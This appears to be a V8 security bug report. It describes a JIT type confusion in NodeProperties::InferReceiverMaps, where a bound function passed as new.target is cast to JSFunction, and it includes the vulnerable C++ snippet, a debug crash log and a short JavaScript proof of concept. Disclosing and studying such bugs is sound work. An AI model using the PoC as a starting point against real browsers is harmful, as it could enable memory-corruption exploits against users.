Here's a snippet of NodeProperties::InferReceiverMaps.
case IrOpcode::kJSCreate: {
if (IsSame(receiver, effect)) {
HeapObjectMatcher mtarget(GetValueInput(effect, 0));
HeapObjectMatcher mnewtarget(GetValueInput(effect, 1));
if (mtarget.HasValue() && mnewtarget.HasValue()) {
Handle<JSFunction> original_constructor =
Handle<JSFunction>::cast(mnewtarget.Value());
if (original_constructor->has_initial_map()) {
Handle<Map> initial_map(original_constructor->initial_map());
if (initial_map->constructor_or_backpointer() ==
*mtarget.Value()) {
*maps_return = ZoneHandleSet<Map>(initial_map);
return result;
}
}
}
// We reached the allocation of the {receiver}.
return kNoReceiverMaps;
}
break;
}
"mnewtarget" is expected to be a constructor which also can be of type JSBoundFunction. But "mnewtarget" is always cast to JSFunction which leads to type confusion.
The PoC seems not to crash in release mode.
Debug mode log:
#
# Fatal error in ../../src/objects-inl.h, line 566
# Check failed: !v8::internal::FLAG_enable_slow_asserts || (object->IsJSFunction()).
#
==== C stack trace ===============================
class Derived extends Base {
constructor() {
// JSCreate emitted I guess.
super();
}
}
let bound = Object.bind();
Reflect.construct(Derived, [], bound); // Feed a bound function as new.target to the profiler, so HeapObjectMatcher can find it.
%OptimizeFunctionOnNextCall(Derived);
new Derived();
Chrome v8 jit nodeproperties::inferreceivermaps type confusion